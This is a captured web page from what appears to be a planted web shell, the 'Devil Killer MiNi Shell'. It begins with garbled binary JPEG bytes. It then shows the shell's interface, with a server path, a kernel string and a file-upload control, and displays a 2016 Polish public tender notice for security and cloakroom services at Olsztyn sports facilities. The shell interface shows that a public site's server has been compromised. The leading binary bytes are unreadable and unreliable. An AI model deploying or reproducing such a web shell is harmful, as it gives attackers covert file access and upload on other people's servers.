JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161122/348551-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.osir.olsztyn.pl BIP zakładka Zamówienia Publiczne' target='_blank'>www.osir.olsztyn.pl BIP zakładka Zamówienia Publiczne</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 348551 - 2016
              z dnia 2016-11-22 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Olsztyn: Ochrona  osób, mienia w formie bezpośredniej ochrony fizycznej i monitoringu z zainstalowanych urządzeń alarmowych w obiektach OSiR W Olsztynie, ochrona masowych imprez sportowych oraz serwis szatniowy w WCRS w Olsztynie  w okresie od 01.01.2017 do 31.12.2017<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Ośrodek Sportu i Rekreacji w Olsztynie, krajowy numer identyfikacyjny
              28056355900000, ul.
              ul. Żołnierska 
              ,
              10558  
              Olsztyn, woj.
              warmińsko-mazurskie, państwo
              , tel.
              895 335 132, e-mail
              przetargi@osir.olsztyn.pl, faks
              895 335 132.
              <br />
              Adres strony internetowej (URL): www.osir.olsztyn.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: jednostka organizacyjne jednostki samorządu terytorialnego</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.osir.olsztyn.pl BIP zakładka Zamówienia Publiczne</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />na adres Zamawiającego<br />
                Adres:
                <br />10-558 Olsztyn, ul. Żołnierska 13a, pokój nr 4</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Ochrona  osób, mienia w formie bezpośredniej ochrony fizycznej i monitoringu z zainstalowanych urządzeń alarmowych w obiektach OSiR W Olsztynie, ochrona masowych imprez sportowych oraz serwis szatniowy w WCRS w Olsztynie  w okresie od 01.01.2017 do 31.12.2017<br /><b>Numer referencyjny: </b>A-ZP.OSiR.171.4.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>CZĘŚĆ I ZAMÓWIENIA 
Wykonanie bezpośredniej ochrony fizycznej oraz monitoringu elektronicznego z zainstalowanych urządzeń alarmowych w obiektach OSiR:
1)	HWS Urania w Olsztynie, al. Piłsudskiego 44  - część administracyjna (portiernia i lodowisko w obrębie ogrodzenia) część kryta w miesiącach I, II, III, IV, V, IX, X, XI, XII w dniach od poniedziałku do piątku w godzinach 21.00  07.00; w miesiącach: VI, VII, VIII w dniach od poniedziałku do piątku w godzinach 18.00-07.00. 
W soboty, niedziele i święta  całodobowo. Ochrona świadczona przez jednego pracownika ochrony. Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1 do SIWZ Opis przedmiotu zamówienia
2)	Lodowisko-Boisko w Olsztynie ul. Jeziołowicza 4  teren zamknięty, ogrodzony w obrębie którego są: lokal użytkowy w czterech kontenerach przestawnych (kasa, pomieszczenie socjalne i wypożyczalnia łyżew), garaż na rolbę, zbiorniki z glikolem, agregat chłodniczy oraz kolektory chłodnicze ochrona będzie świadczona przez 7 dni w tygodniu od poniedziałku do niedzieli w godzinach 22.00-10.00 w miesiącach I, II, XII; w miesiącu marcu w godzinach 22.00-07.00 w dni powszednie oraz soboty i niedziele w godzinach od 07.00 do 07.00, w pozostałych miesiącach (IV, V, VI, VII, VIII, IX, X, XI) w godzinach 22.00  07.00. Ochrona świadczona przez jednego pracownika. Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1a do SIWZ Opis przedmiotu zamówienia
3)	ZOOS Stadion w Olsztynie przy al. Piłsudskiego 69 A  część administracyjna, część kryta i stadion  ochrona  świadczona będzie w okresie: 
01.01. 13.03.  w godz. 15.30  07.30    (po 16   godz.)
14.03.  14.06.  w godz. 19.00  07.30 (po 12,5 godz.)
15.06.  15.08.  w godz. 15.30  07.30 (po 16 godz.)
16.08  31.10.  w godz. 19.00- 07.30 (po 12,5 godz.)  
01.11.  31.12.  w godz. 15.30  07.30 (po 16 godz.)
W soboty, niedziele i święta  całodobowo. Ochrona świadczona przez jednego pracownika. Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1b do SIWZ Opis przedmiotu zamówienia. 
4)	ZKOS I w Olsztynie, ul. Głowackiego 27  ochrona obejmuje wszystkie budowle i urządzenia na terenie i wokół obiektu, prowadzona będzie w okresach:
02.01.  30.04  w godz. 08.15  14.15 i 16.15  21.15 (po 11 godz.) od poniedziałku do piątku (bez 06.01 i 17.04.)
02.01.  30.04  w godz. 09.30  18.30 (po 9 godz.) w soboty i niedziele (bez 16.04)
16.10. 31.12.  w godz. 08.15  14.15 i 16.15  21.15 (po 11 godz.) od poniedziałku do piątku                                                   (bez 01.11, 25-26. 12.)
16.10.  31.12.  w godz. 09.30  18.30 (po 9 godz.) w soboty i niedziele (bez 11.11)
Ochrona świadczona przez jednego pracownika.  Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1c do SIWZ Opis przedmiotu zamówienia.
5)	ZKOS II  w Olsztynie, ul. Mariańska 1  ochrona obejmuje wszystkie budowle i urządzenia na terenie i wokół obiektu, prowadzona będzie w okresach:
02.01.  30.06.  w godz. 22.00  06.00 (po 8 godz.)
01.07.  15.08.  w godz. 20.00  08.00 (po 12 godz.)
16.08.  31.12.  w godz. 22.00  06.00 (po 8 godz.)
Całodobowo w dniach: 01.01, 06.01, 16.04, 17.04, 01.05, 03.05, 15.06, 15.08, 01.11, 11.11, 25.12, 26.12
W dniach: 24.12 i 31.12 od godz. 15.00  24.00 (po 9 godz.)
Ochrona świadczona przez jednego pracownika. Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1d do SIWZ Opis przedmiotu zamówienia.
6)	CRS Ukiel Olsztyn, obszar przy ul. Olimpijskiej 1 ochronie podlega cały obszar CRS tj. budynki D1, D7+D8, D9; pomosty, boiska sportowe, urządzenia, instalacje i wyposażenie terenu oraz sprzęt pływający, cumujący w mokrych boksach przy pomostach oraz sprzęt składowany na terenie obszaru.
Usługa realizowana będzie od dnia 01.01.  31.12. codziennie  w godzinach 20.00  08.00 przez jednego pracownika ochrony. Łącznie 4380 godz. Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1e do SIWZ Opis przedmiotu zamówienia.
7)	CRS Ukiel Olsztyn, obszar przy ul. Sielskiej 38  ochronie podlega cały obszar CRS Ukiel tj. budynki C1 i C2; budynek gospodarczy , pomosty, boisko sportowe, urządzenia, instalacje i wyposażenie terenu oraz sprzęt pływający, cumujący w mokrych boksach przy pomostach oraz sprzęt składowany na terenie obszaru.
Usługa realizowana będzie od dnia 01.01.  31.12. codziennie  w godzinach 20.00  08.00 przez jednego pracownika ochrony. Łącznie 4380 godz. Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1e do SIWZ Opis przedmiotu zamówienia
8)	Kąpielisko Sezonowe SKANDA - Olsztyn, ul. Plażowa nad jeziorem Skanda: ochronie podlega cały obszar plaży i kąpieliska, kontener socjalno-magazynowy, kontenery sanitarne, sprzęt i urządzenia kąpieliska. 
Ochrona realizowana będzie codziennie przez jednego pracownika ochrony w dniach:
Od dnia 22.06.  od godz. 08.00 do dnia 23.06. do godz. 10.00 (26 godz.)
W okresie od 23.06.  01.09.  codziennie w godzinach 18.00  10.00
W dniu 01.09. w godz. 10.00 do 18.00 
Łącznie 1154 godziny. Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1e do SIWZ Opis przedmiotu zamówienia
9)	Kąpielisko sezonowe SŁONECZNA POLANA, Olsztyn, ul. Sielska 38 nad jeziorem Ukiel.
Ochronie podlega cały obszar plaży i kąpieliska, kontener socjalno-magazynowy, kontenery sanitarne, sprzęt i urządzenia wyposażenia kąpieliska.
Ochrona realizowana będzie codziennie przez jednego pracownika ochrony w dniach:
Od dnia 22.06.  od godz. 08.00 do dnia 23.06. do godz. 10.00 (26 godz.)
W okresie od 23.06.  01.09.  codziennie w godzinach 18.00  10.00
W dniu 01.09. w godz. 10.00 do 18.00 
Łącznie 1154 godziny. Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1e do SIWZ Opis przedmiotu zamówienia
10)	 WCRS Aquasfera GALERIA WARMIŃSKA, Olsztyn ul. Piłsudskiego 69 b.
        Ochrona świadczona będzie w okresie od 01.01.  31.12.  codziennie w godz. 06.00  22.30 przez dwóch   
        pracowników ochrony pełniących równocześnie dyżur na stanowiskach: stanowisko nr 1 przy kasach biletowych   
        jedna osoba, stanowisko nr 2  parking podziemny  jedna osoba.
        Monitoring i przyjmowanie zgłoszeń interwencyjnych telefonicznie  wezwanie patrolu przez obsługę obiektu 
        codziennie w godz. 22.30  06.00
       Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1f do SIWZ Opis przedmiotu zamówienia

11) Ochrona elektroniczna  - monitoring (obsługa z już zainstalowanych urządzeń alarmowych oraz interwencje w  
       przypadku alarmów) z następujących obiektów całodobowo:
a)	 Administracyjna część budynku  Zarząd OSiR w  tym garaże w Olsztynie, ul. Żołnierska 13 a.
b)	  ZKOS I  Olsztyn, ul. Głowackiego 27.
Szczegółowy zakres świadczenia ochrony - monitoringu stanowi zał. nr 1g do   SIWZ Opis przedmiotu zamówienia. 

CZĘŚĆ II ZAMÓWIENIA
Ochrona masowych imprez sportowych organizowanych przez OSiR w Olsztynie w 2017 r.
Do zadań ochrony sportowych imprez masowych należeć będzie zabezpieczenie sportowych imprez masowych odbywających się w:
-  Hali Widowiskowo  Sportowej Urania 
- Wodnym Centrum Sportowo  Rekreacyjnym  Aquasfera Galeria Warmińska  imprezy pływackie rangi Mistrzostw Polski (ilość imprez zależna od decyzji PZP o przyznaniu Ośrodkowi Sportu i Rekreacji w Olsztynie imprezy do realizacji)
-  imprez odbywających się na terenie Centrum Rekreacyjno-Sportowego Ukiel  z wyłączeniem   turnieju rangi World Tour Grand Slam w Siatkówce Plażowej
- II Ukiel Olsztyn Półmaraton zabezpieczenie na terenie miasta.
- imprezy nie przewidziane w Kalendarzu Imprez
W sumie  900 roboczogodzin.
Do zadań kierownika zabezpieczenia należeć będzie opracowanie Planu Zabezpieczenia Imprezy Sportowej o Charakterze Masowym wraz z Instrukcją postępowania w przypadku pożaru lub innego miejscowego zagrożenia w miejscu i w czasie imprezy masowej i dostarczeniu go w odpowiednim terminie min. 35 dni przed planowanym wydarzeniem organizatorowi. Podczas imprez na terenie miasta zabezpieczenie musi posiadać własny transport samochodowy w celu sprawnego rozmieszczania poszczególnych posterunków oraz własne środki łączności pozwalające na kontakt pomiędzy pracownikami a także z dyżurnym miasta, policją, strażą pożarną i pogotowiem medycznym. Pracownicy służby porządkowej oraz kierownik zabezpieczenia  muszą być przeszkoleni zgodnie z Rozporządzeniem Rady Ministrów z dnia 30 sierpnia 2011 r. (Dz. U. nr 183 poz. 1087 ze zmianami) i muszą posiadać aktualne zaświadczenia uprawniające do zabezpieczenia imprez masowych. Pracownicy służby porządkowej oraz służby informacyjnej podczas imprez muszą być ubrani w jednakowe stroje z symbolem Firmy, legitymować się identyfikatorem zawierającym następujące informacje: nazwę wystawcy, numer identyfikacyjny i fotografię osoby dokonującej czynności związanej z zabezpieczeniem imprezy, okres ważności, pieczęć i podpis wystawcy. Posiadać odpowiednie wyposażenie zgodne z wymogami oraz środki łączności. Postępowanie służb zabezpieczenia powinno być oparte o instrukcję określającą zadania służb porządkowych i informacyjnych oraz warunki łączności pomiędzy podmiotami biorącymi udział w zabezpieczeniu: opracowane  na podstawie ustawy o bezpieczeństwie imprez masowych z dnia 20 marca 2009 r. (Dz. U. z 2013 r., poz. 611,628,829). 
Zakres obowiązków pracowników -  Służby porządkowej i informacyjnej:
 - Obserwacja dróg ewakuacyjnych, parkingu VIP oraz terenu przyległego;
 - Niedopuszczenie pojazdów nieuprawnionych do korzystania z drogi ewakuacyjnej  oraz  parkingu VIP;
- Umożliwienie swobodnego wjazdu i wyjazdu pojazdom uprzywilejowanym w pobliże  obiektu;
 - Interweniowanie w przypadku stwierdzenia zaboru mienia lub próby dewastacji mienia, naruszenia porządku publicznego;
 - Interweniowanie po stwierdzeniu dokonania kradzieży lub rozboju
 -  legitymowania osób w celu ustalenia ich tożsamości;
-  przeglądania zawartości bagażu osób, w przypadku podejrzenia, że osoby te wnoszą lub  posiadają broń lub inne niebezpieczne przedmioty, materiały wybuchowe, wyroby pirotechniczne, materiały pożarowo niebezpieczne, napoje alkoholowe, środki odurzające  lub substancje psychotropowe;
 -  stwierdzania uprawnień osób do przebywania na imprezie masowej, a w przypadku stwierdzenia braku takich uprawnień  wezwania ich do opuszczenia imprezy masowej;
 - wydawania poleceń porządkowych osobom zakłócającym porządek publiczny lub  zachowującym się niezgodnie z regulaminem imprezy masowej, a w przypadku niewykonania tych poleceń  wezwania ich do opuszczenia imprezy masowej;
- stosowania siły fizycznej w postaci chwytów obezwładniających oraz podobnych technik obrony w przypadku zagrożenia dóbr powierzonych ochronie lub odparcia ataku na członka służby porządkowej lub inną osobę na zasadach określonych w art. 38 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia ( Dz.U. nr 114, poz. 740 z późń. zm.)
 - ujęcia w celu niezwłocznego przekazania Policji, osób stwarzających bezpośrednie zagrożenie dla życia lub zdrowia ludzkiego, a także chronionego mienia.
Powyższe czynności powinny być wykonywane w sposób możliwie najmniej naruszający godność ludzką oraz inne dobra osobiste osoby, w stosunku do której zostały podjęte. 
Ilość roboczogodzin może ulec zmianie  w zależności od ilości realizowanych imprez.

CZĘŚĆ III ZAMÓWIENIA
Serwis szatniowy  obsługa szatni głównej w WCRS Aquasfera Galeria Warmińska,                                  Olsztyn, ul. Piłsudskiego 69 b w 2017 r.
W okresie od 01.01.  31.12.2017 r. z podziałem na okres zimowy i letni
1) Okres zimowy: 01.01.-31.05.2017 i 01.10.-31.12.2017 (6495 osobogodzin)  dyżur pracowników ochrony  serwis szatniowy  obsługa szatni głównej  realizowane w następujący sposób: od poniedziałku do niedzieli (6125 osobogodzin) w godzinach 06.00-14.00 (8 godz.)  - 1 osoba; godz. 14.00  22.30 (8,5 godziny)  2 osoby i dodatkowo sobota i niedziela (370 osobogodzin) godz. 09.00-14.00 (5 godzin)  1 osoba
2)Okres letni  01.06-30.09.2017 (2013 osobogodzin) dyżur pracowników ochrony-serwis szatniowy - obsługa szatni głównej realizowany w następujący sposób: od poniedziałku do niedzieli (2013 osobogodzin) w godz. 06.00-14.00 -  (8 godz.) -  1osoba; w godz. 14.00  22.30 (8,5 godziny) - 1 osoba
Wykaz czynności do realizacji na stanowisku:
- odbieranie okryć wierzchnich i lekkich toreb od Klientów obiektu i wydawanie numerków szatniowych
- wydawanie rzeczy oddanych do depozytu i odbiór numerków
- informowanie Klientów o odbywających się imprezach i zajęciach na obiekcie
- informowanie Klientów i kierowanie w odpowiednie rejony obiektu
- utrzymywanie porządku na stanowisku pracy i w najbliższym sąsiedztwie
- współdziałanie z innymi służbami w przypadku zagrożenia

6.	Zamawiający nie dopuszcza możliwości składania ofert wariantowych. 
7.	Zamawiający przewiduje  możliwość udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt 6 / 7.  Zamówienie uzupełniające dotyczy części I  obiektów ZOOS, ZKOS I i ZKOS II w zakresie ochrony fizycznej i wynosi 10% wartości zamówienia podstawowego wymienionych obiektów.
8.	Zamawiający z wyłączeniem cz. II zamówienia wymaga zatrudnienia przez wykonawcę lub podwykonawcę świadczącego usługi osób wykonujących czynności w zakresie realizacji zamówienia , wymienionych w opisach przedmiotu zamówienia stanowiących załączniki do SIWZ zgodnie z obowiązującymi przepisami prawa określonymi w art. 22 § 1 ustawy z dnia 26.06.1974 r.  Kodeks pracy (Dz. U. z 2014 r. poz. 1502 z pózn. zm.) oraz w ustawie z dnia 22.07.2016 r. o zmianie ustawy o minimalnym wynagrodzeniu za pracę oraz niektórych innych ustaw. W trakcie realizacji zamówienia zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec wykonawcy odnośnie spełniania przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane powyżej   czynności.
<br /><br /><b>II.5) Główny kod CPV: </b>79710000-4<br /><b> Dodatkowe kody CPV:</b>79711000-1,
                75240000-0,
                98390000-3<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje  możliwość udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt 6 / 7.  Zamówienie uzupełniające dotyczy części I  obiektów ZOOS, ZKOS I i ZKOS II w zakresie ochrony fizycznej i wynosi 10% wartości zamówienia podstawowego wymienionych obiektów.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/01/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli wykaże, że posiada koncesję wydaną na podstawie Ustawy z dnia 22.08.1997 r. o Ochronie Osób i Mienia (Dz. U. z 2005, nr 145, poz. 1221 z późn. zmianami) na prowadzenie działalności gospodarczej określonej w niniejszym postępowaniu.( dotyczy CZĘŚCI  I, II i III)<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną min. 1.500.000 PLN. (Dotyczy CZĘŚCI I, II i III)<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
